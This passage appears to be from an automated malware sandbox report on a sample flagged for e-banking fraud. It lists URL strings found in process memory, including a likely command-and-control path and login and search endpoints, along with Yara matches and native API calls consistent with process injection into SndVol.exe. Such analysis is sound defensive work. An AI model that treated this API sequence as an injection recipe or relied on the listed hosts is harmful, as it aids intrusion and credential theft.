                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.jindouzhibo.net
                Source: firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.jutuzhibo.net
                Source: CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768386121.00000000027FD000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.kakupi.info
                Source: CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768386121.00000000027FD000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.kakupi.info/nezi/
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lamachine.net
                Source: firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lanyunzhibo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.legalvideos.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.xinghuizhibo.com
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.xinghuizhibo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.xiuchangzhibo.com
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.xiupazhibo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.xuanmozhibo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.yanyangzhibo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.yanyuzhibo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.yechuizhibo.com
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.yewuzhibo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.yeyanzhibo.com
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.yeyuezhi.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.yinhezhibo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.yuemanzhibo.com
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.yumizhibo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.yushenzhibo.com
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.yutongzhibo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ziah.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.zootech.net
                Source: SndVol.exe, 00000009.00000002.3771875465.0000000008468000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: https://beian.miit.gov.cn/#/Integrated/index
                Source: SndVol.exe, 00000009.00000002.3771875465.0000000008468000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: SndVol.exe, 00000009.00000002.3771875465.0000000008468000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: SndVol.exe, 00000009.00000002.3771875465.0000000008468000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: SndVol.exe, 00000009.00000002.3771875465.0000000008468000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: SndVol.exe, 00000009.00000002.3771875465.0000000008468000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: SndVol.exe, 00000009.00000002.3771875465.0000000008468000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: https://img.ucdl.pp.uc.cn/upload_files/wdj_web/public/img/favicon.ico
                Source: SndVol.exe, 00000009.00000002.3761170910.00000000032DA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: SndVol.exe, 00000009.00000002.3761170910.00000000032DA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: SndVol.exe, 00000009.00000003.1861217165.000000000845B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: SndVol.exe, 00000009.00000002.3761170910.00000000032DA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: SndVol.exe, 00000009.00000002.3761170910.00000000032DA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033~
                Source: SndVol.exe, 00000009.00000002.3761170910.00000000032DA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: SndVol.exe, 00000009.00000002.3761170910.00000000032DA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: https://push.zhanzhang.baidu.com/push.js
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: https://ucan.25pp.com/Wandoujia_wandoujia_qrbinded.apk
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: https://white.anva.org.cn/
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: https://www.12377.cn/
                Source: SndVol.exe, 00000009.00000002.3771875465.0000000008468000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: https://zzlz.gsxt.gov.cn/

                E-Banking Fraud

                Source: Yara match | File source: 4.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 4.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000009.00000002.3768384183.0000000004E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.1669076954.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.1671103220.0000000001B30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.3768451567.0000000004E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.3768386121.0000000002790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.3757230807.0000000003090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.1671316261.0000000003A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.3768471999.0000000004260000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0042CC83 NtClose, | 4_2_0042CC83
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01752B60 NtClose,LdrInitializeThunk, | 4_2_01752B60
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01752DF0 NtQuerySystemInformation,LdrInitializeThunk, | 4_2_01752DF0
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01752C70 NtFreeVirtualMemory,LdrInitializeThunk, | 4_2_01752C70
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017535C0 NtCreateMutant,LdrInitializeThunk, | 4_2_017535C0
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01754340 NtSetContextThread, | 4_2_01754340
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01754650 NtSuspendThread, | 4_2_01754650
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01752BF0 NtAllocateVirtualMemory, | 4_2_01752BF0
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01752BE0 NtQueryValueKey, | 4_2_01752BE0
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01752BA0 NtEnumerateValueKey, | 4_2_01752BA0
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01752B80 NtQueryInformationFile, | 4_2_01752B80
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01752AF0 NtWriteFile, | 4_2_01752AF0
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01752AD0 NtReadFile, | 4_2_01752AD0
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01752AB0 NtWaitForSingleObject, | 4_2_01752AB0
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01752D30 NtUnmapViewOfSection, | 4_2_01752D30
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01752D10 NtMapViewOfSection, | 4_2_01752D10
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01752D00 NtSetInformationFile, | 4_2_01752D00
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01752DD0 NtDelayExecution, | 4_2_01752DD0
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01752DB0 NtEnumerateKey, | 4_2_01752DB0
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01752C60 NtCreateKey, | 4_2_01752C60
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01752C00 NtQueryInformationProcess, | 4_2_01752C00
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01752CF0 NtOpenProcess, | 4_2_01752CF0
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01752CC0 NtQueryVirtualMemory, | 4_2_01752CC0
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01752CA0 NtQueryInformationToken, | 4_2_01752CA0
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01752F60 NtCreateProcessEx, | 4_2_01752F60
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01752F30 NtCreateSection, | 4_2_01752F30
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01752FE0 NtCreateFile, | 4_2_01752FE0
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01752FB0 NtResumeThread, | 4_2_01752FB0
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01752FA0 NtQuerySection, | 4_2_01752FA0
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01752F90 NtProtectVirtualMemory, | 4_2_01752F90
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01752E30 NtWriteVirtualMemory, | 4_2_01752E30
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01752EE0 NtQueueApcThread, | 4_2_01752EE0
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01752EA0 NtAdjustPrivilegesToken, | 4_2_01752EA0
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01752E80 NtReadVirtualMemory, | 4_2_01752E80
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01753010 NtOpenDirectoryObject, | 4_2_01753010
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01753090 NtSetValueKey, | 4_2_01753090
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017539B0 NtGetContextThread, | 4_2_017539B0
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01753D70 NtOpenThread, | 4_2_01753D70
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01753D10 NtOpenProcessToken, | 4_2_01753D10
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 9_2_05114650 NtSuspendThread,LdrInitializeThunk, | 9_2_05114650
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 9_2_05114340 NtSetContextThread,LdrInitializeThunk, | 9_2_05114340
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 9_2_05112D10 NtMapViewOfSection,LdrInitializeThunk, | 9_2_05112D10
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 9_2_05112D30 NtUnmapViewOfSection,LdrInitializeThunk, | 9_2_05112D30
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 9_2_05112DD0 NtDelayExecution,LdrInitializeThunk, | 9_2_05112DD0
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 9_2_05112DF0 NtQuerySystemInformation,LdrInitializeThunk, | 9_2_05112DF0
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 9_2_05112C70 NtFreeVirtualMemory,LdrInitializeThunk, | 9_2_05112C70
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 9_2_05112C60 NtCreateKey,LdrInitializeThunk, | 9_2_05112C60
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 9_2_05112CA0 NtQueryInformationToken,LdrInitializeThunk, | 9_2_05112CA0
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 9_2_05112F30 NtCreateSection,LdrInitializeThunk, | 9_2_05112F30
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 9_2_05112FB0 NtResumeThread,LdrInitializeThunk, | 9_2_05112FB0
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 9_2_05112FE0 NtCreateFile,LdrInitializeThunk, | 9_2_05112FE0
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 9_2_05112E80 NtReadVirtualMemory,LdrInitializeThunk, | 9_2_05112E80
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 9_2_05112EE0 NtQueueApcThread,LdrInitializeThunk, | 9_2_05112EE0
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 9_2_05112B60 NtClose,LdrInitializeThunk, | 9_2_05112B60
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 9_2_05112BA0 NtEnumerateValueKey,LdrInitializeThunk, | 9_2_05112BA0
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 9_2_05112BF0 NtAllocateVirtualMemory,LdrInitializeThunk, | 9_2_05112BF0
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 9_2_05112BE0 NtQueryValueKey,LdrInitializeThunk, | 9_2_05112BE0
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 9_2_05112AD0 NtReadFile,LdrInitializeThunk, | 9_2_05112AD0
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 9_2_05112AF0 NtWriteFile,LdrInitializeThunk, | 9_2_05112AF0
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 9_2_051135C0 NtCreateMutant,LdrInitializeThunk, | 9_2_051135C0
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 9_2_051139B0 NtGetContextThread,LdrInitializeThunk, | 9_2_051139B0
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 9_2_05112D00 NtSetInformationFile, | 9_2_05112D00
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 9_2_05112DB0 NtEnumerateKey, | 9_2_05112DB0
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 9_2_05112C00 NtQueryInformationProcess, | 9_2_05112C00
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 9_2_05112CC0 NtQueryVirtualMemory, | 9_2_05112CC0
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 9_2_05112CF0 NtOpenProcess, | 9_2_05112CF0
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 9_2_05112F60 NtCreateProcessEx, | 9_2_05112F60
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 9_2_05112F90 NtProtectVirtualMemory, | 9_2_05112F90
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 9_2_05112FA0 NtQuerySection, | 9_2_05112FA0
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 9_2_05112E30 NtWriteVirtualMemory, | 9_2_05112E30
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 9_2_05112EA0 NtAdjustPrivilegesToken, | 9_2_05112EA0
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 9_2_05112B80 NtQueryInformationFile, | 9_2_05112B80
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 9_2_05112AB0 NtWaitForSingleObject, | 9_2_05112AB0
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 9_2_05113010 NtOpenDirectoryObject, | 9_2_05113010
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 9_2_05113090 NtSetValueKey, | 9_2_05113090
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 9_2_05113D10 NtOpenProcessToken, | 9_2_05113D10
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 9_2_05113D70 NtOpenThread, | 9_2_05113D70
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 9_2_030B9330 NtCreateFile, | 9_2_030B9330
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 9_2_030B97A0 NtAllocateVirtualMemory, | 9_2_030B97A0
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 9_2_030B9640 NtClose, | 9_2_030B9640
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 9_2_030B95A0 NtDeleteFile, | 9_2_030B95A0
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 9_2_030B94A0 NtReadFile, | 9_2_030B94A0
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 9_2_04F8F976 NtMapViewOfSection, | 9_2_04F8F976
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_056803D8 | 0_2_056803D8
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_05680D88 | 0_2_05680D88
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_05680D98 | 0_2_05680D98
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_05687BB8 | 0_2_05687BB8
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0740B728 | 0_2_0740B728
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_07402E78 | 0_2_07402E78
